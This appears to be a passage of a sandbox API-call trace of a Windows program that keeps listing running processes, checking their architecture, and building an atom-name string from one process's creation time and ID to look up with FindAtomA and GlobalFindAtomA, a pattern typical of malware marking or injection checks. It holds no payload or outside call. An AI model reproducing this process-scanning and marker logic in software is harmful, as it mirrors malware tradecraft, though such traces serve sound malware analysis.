	[0102.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.756] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.756] CloseHandle (hObject=0x690) returned 1
	[0102.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.756] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.756] CloseHandle (hObject=0x690) returned 1
	[0102.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.756] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.756] CloseHandle (hObject=0x690) returned 1
	[0102.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.757] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.757] CloseHandle (hObject=0x690) returned 1
	[0102.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.757] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.757] CloseHandle (hObject=0x690) returned 1
	[0102.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.757] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.758] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.758] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.758] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.758] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.758] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.759] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.759] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.759] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.759] CloseHandle (hObject=0x690) returned 1
	[0102.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.759] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.759] CloseHandle (hObject=0x690) returned 1
	[0102.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.759] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.759] CloseHandle (hObject=0x690) returned 1
	[0102.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.797] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.798] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.800] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.800] CloseHandle (hObject=0x690) returned 1
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.800] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.801] CloseHandle (hObject=0x690) returned 1
	[0102.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.801] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.801] CloseHandle (hObject=0x690) returned 1
	[0102.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.801] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.801] CloseHandle (hObject=0x690) returned 1
	[0102.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.801] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.801] CloseHandle (hObject=0x690) returned 1
	[0102.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.802] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.802] CloseHandle (hObject=0x690) returned 1
	[0102.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.802] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.802] CloseHandle (hObject=0x690) returned 1
	[0102.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.802] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.802] CloseHandle (hObject=0x690) returned 1
	[0102.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.802] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.802] CloseHandle (hObject=0x690) returned 1
	[0102.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.802] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.803] CloseHandle (hObject=0x690) returned 1
	[0102.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.803] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.803] CloseHandle (hObject=0x690) returned 1
	[0102.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.803] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.803] CloseHandle (hObject=0x690) returned 1
	[0102.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.803] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.803] CloseHandle (hObject=0x690) returned 1
	[0102.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.803] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.803] CloseHandle (hObject=0x690) returned 1
	[0102.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.804] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.804] CloseHandle (hObject=0x690) returned 1
	[0102.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.804] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.804] CloseHandle (hObject=0x690) returned 1
	[0102.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.804] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.804] CloseHandle (hObject=0x690) returned 1
	[0102.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.804] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.804] CloseHandle (hObject=0x690) returned 1
	[0102.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.804] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.804] CloseHandle (hObject=0x690) returned 1
	[0102.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.805] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.805] CloseHandle (hObject=0x690) returned 1
	[0102.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.805] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.805] CloseHandle (hObject=0x690) returned 1
	[0102.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.805] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.805] CloseHandle (hObject=0x690) returned 1
	[0102.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.805] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.805] CloseHandle (hObject=0x690) returned 1
	[0102.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.805] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.805] CloseHandle (hObject=0x690) returned 1
	[0102.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.806] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.806] CloseHandle (hObject=0x690) returned 1
	[0102.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.806] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.806] CloseHandle (hObject=0x690) returned 1
	[0102.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.806] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.806] CloseHandle (hObject=0x690) returned 1
	[0102.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.806] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.806] CloseHandle (hObject=0x690) returned 1
	[0102.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.807] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.807] CloseHandle (hObject=0x690) returned 1
	[0102.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.807] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.807] CloseHandle (hObject=0x690) returned 1
	[0102.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.807] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.807] CloseHandle (hObject=0x690) returned 1
	[0102.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.808] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.808] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.808] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.808] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.808] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.809] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.809] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.809] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.809] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.809] CloseHandle (hObject=0x690) returned 1
	[0102.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.809] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.809] CloseHandle (hObject=0x690) returned 1
	[0102.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.809] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.809] CloseHandle (hObject=0x690) returned 1
	[0102.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.852] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.852] CloseHandle (hObject=0x690) returned 1
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.852] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.852] CloseHandle (hObject=0x690) returned 1
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.852] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.853] CloseHandle (hObject=0x690) returned 1
	[0102.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.853] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.853] CloseHandle (hObject=0x690) returned 1
	[0102.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.853] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.853] CloseHandle (hObject=0x690) returned 1
	[0102.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.853] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.853] CloseHandle (hObject=0x690) returned 1
	[0102.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.853] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.853] CloseHandle (hObject=0x690) returned 1
	[0102.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.853] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.854] CloseHandle (hObject=0x690) returned 1
	[0102.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.854] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.854] CloseHandle (hObject=0x690) returned 1
	[0102.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.854] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.854] CloseHandle (hObject=0x690) returned 1
	[0102.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.854] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.854] CloseHandle (hObject=0x690) returned 1
	[0102.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.854] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.854] CloseHandle (hObject=0x690) returned 1
	[0102.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.855] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.855] CloseHandle (hObject=0x690) returned 1
	[0102.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.855] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.855] CloseHandle (hObject=0x690) returned 1
	[0102.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.855] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.855] CloseHandle (hObject=0x690) returned 1
	[0102.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.855] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.855] CloseHandle (hObject=0x690) returned 1
	[0102.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.855] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.855] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.856] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.856] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.856] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.856] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.856] CloseHandle (hObject=0x690) returned 1
	[0102.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.856] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.857] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.857] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.857] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.857] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.857] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.857] CloseHandle (hObject=0x690) returned 1
	[0102.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.858] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.858] CloseHandle (hObject=0x690) returned 1
	[0102.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.858] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.858] CloseHandle (hObject=0x690) returned 1
	[0102.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.858] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.858] CloseHandle (hObject=0x690) returned 1
	[0102.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.859] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.859] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.859] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.859] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.860] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.860] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.860] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.860] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.860] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
